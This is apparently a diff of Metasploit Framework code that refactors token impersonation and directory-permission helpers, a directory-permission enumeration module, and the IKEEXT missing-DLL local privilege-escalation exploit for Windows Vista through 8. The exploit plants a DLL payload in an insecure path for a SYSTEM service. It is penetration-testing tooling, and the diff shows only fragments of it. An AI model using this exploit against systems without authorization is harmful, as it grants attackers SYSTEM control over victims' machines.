Updates

lib/msf/core/post/windows/accounts.rb

@@ -180,7 +180,7 @@ def lookup_SID_NAME_USE(enum_value)
 
 	# Gets an impersonation token from the primary token.
 	#
-	# @return [Fixnum] the impersonate token handle identifier if success, 0 if
+	# @return [Fixnum] the impersonate token handle identifier if success, nil if
 	#	fails
 	def get_imperstoken
 		adv =  session.railgun.advapi32
@@ -195,7 +195,7 @@ def get_imperstoken
 		if it["return"] #if it fails return 0 for error handling
 			return it["DuplicateTokenHandle"]
 		else
-			return 0
+			return nil
 		end
 	end
 
@@ -213,11 +213,19 @@ def check_dir_perms(dir, token)
 		#define generic mapping structure
 		gen_map = [0,0,0,0]
 		gen_map = gen_map.pack("L")
+		buffer_size = 500
 
 		#get Security Descriptor for the directory
-		f = adv.GetFileSecurityA(dir, si, 20, 20, 4)
-		f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4)
-		sd = f["pSecurityDescriptor"]
+		f = adv.GetFileSecurityA(dir, si, buffer_size, buffer_size, 4)
+		if (f['return'] and f["lpnLengthNeeded"] <= buffer_size)
+			sd = f["pSecurityDescriptor"]
+		elsif (f['GetLastError'] == 2)
+			vprint_error("The system cannot find the file specified: #{dir}")
+			return nil
+		else
+			f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4)
+		end
+
 
 		#check for write access, called once to get buffer size
 		a = adv.AccessCheck(sd, token, "ACCESS_READ | ACCESS_WRITE", gen_map, 0, 0, 4, 8)

modules/exploits/windows/local/ikeext_service.rb

@@ -11,7 +11,7 @@
 require 'msf/core/post/windows/priv'
 
 class Metasploit3 < Msf::Exploit::Local
-	Rank = ExcellentRanking
+	Rank = GoodRanking
 
 	include Msf::Exploit::EXE
 	include Msf::Exploit::FileDropper
@@ -26,8 +26,8 @@ def initialize(info={})
 			'Description'	 => %q{
 				This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'
 				(IKEEXT) service which runs as SYSTEM, and starts automatically in default
-				installations of Vista-Win8. Use reverse_http(s) for greater reliability when
-				attempting to reboot system. It requires an insecure bin path to plant the DLL payload.
+				installations of Vista-Win8.
+				It requires an insecure bin path to plant the DLL payload.
 			},
 			'References'	 =>
 				[
@@ -66,17 +66,6 @@ def initialize(info={})
 		@non_existant_dirs = []
 	end
 
-	# Current exist? gives false negative when folder does exist.
-	def exist?(path)
-		begin
-			session.fs.dir.entries(path)
-			return true
-		rescue
-		end
-
-		return false
-	end
-
 	def check_service_exists?(service)
 		srv_info = service_info(service)
 
@@ -98,26 +87,26 @@ def check
 
 		if !check_service_exists?(@service_name)
 			return Exploit::CheckCode::Safe
-		else
-			vprint_status(srv_info)
-
-			case srv_info['Startup']
-			when 'Disabled'
-				print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
-				return Exploit::CheckCode::Safe
-			when 'Manual'
-				print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
-				return Exploit::CheckCode::Safe
-			when 'Auto'
-				print_good("Service is set to Automatically start...")
-			end
+		end
 
-			if check_search_path
-				return Exploit::CheckCode::Safe
-			end
+		vprint_status(srv_info.to_s)
 
-			return Exploit::CheckCode::Vulnerable
+		case srv_info['Startup']
+		when 'Disabled'
+			print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
+			return Exploit::CheckCode::Safe
+		when 'Manual'
+			print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
+			return Exploit::CheckCode::Safe
+		when 'Auto'
+			print_good("Service is set to Automatically start...")
 		end
+
+		if check_search_path
+			return Exploit::CheckCode::Safe
+		end
+
+		return Exploit::CheckCode::Vulnerable
 	end
 
 	def check_search_path
@@ -183,6 +172,7 @@ def check_dirs
 			begin
 				client.fs.dir.mkdir(dir)
 				if exist?(dir)
+					register_file_for_cleanup(dir)
 					return dir
 				end
 			rescue	Rex::Post::Meterpreter::RequestError => e
@@ -211,7 +201,9 @@ def exploit
 		begin
 			@token = get_imperstoken
 		rescue ::Exception => e
-			fail_with(Exploit::Failure::Unknown, "Error while using get_imperstoken: #{e}")
+			vprint_error("Failed to get token, Exception: #{e}")
+		ensure
+			fail_with(Exploit::Failure::Unknown, "Error while using get_imperstoken: #{e}") unless @token
 		end
 
 		if is_system?

modules/post/windows/gather/enum_dirperms.rb

@@ -57,7 +57,7 @@ def enum_subdirs(perm_filter, dpath, maxdepth, token)
 				next if d =~ /^(\.|\.\.)$/
 				realpath = dpath + '\\' + d
 				if session.fs.file.stat(realpath).directory?
-					perm = check_dir(realpath, token)
+					perm = check_dir_perms(realpath, token)
 					if perm_filter and perm and perm.include?(perm_filter)
 						print_status(perm + "\t" + realpath)
 					end
@@ -91,7 +91,7 @@ def get_token
 			t = get_imperstoken()
 		rescue ::Exception => e
 			# Failure due to timeout, access denied, etc.
-			t = 0
+			t = nil
 			vprint_error("Error #{e.message} while using get_imperstoken()")
 			vprint_error(e.backtrace)
 		end
@@ -105,7 +105,7 @@ def enum_perms(perm_filter, token, depth, paths)
 
 			print_status("Checking directory permissions from: #{path}")
 
-			perm = check_dir(path, token)
+			perm = check_dir_perms(path, token)
 			if not perm.nil?
 				# Show the permission of the parent directory
 				if perm_filter and perm.include?(perm_filter)
@@ -135,7 +135,7 @@ def run
 
 		t = get_token
 
-		if t == 0
+		unless t
 			print_error("Getting impersonation token failed")
 		else
 			print_status("Got token: #{t.to_s}...")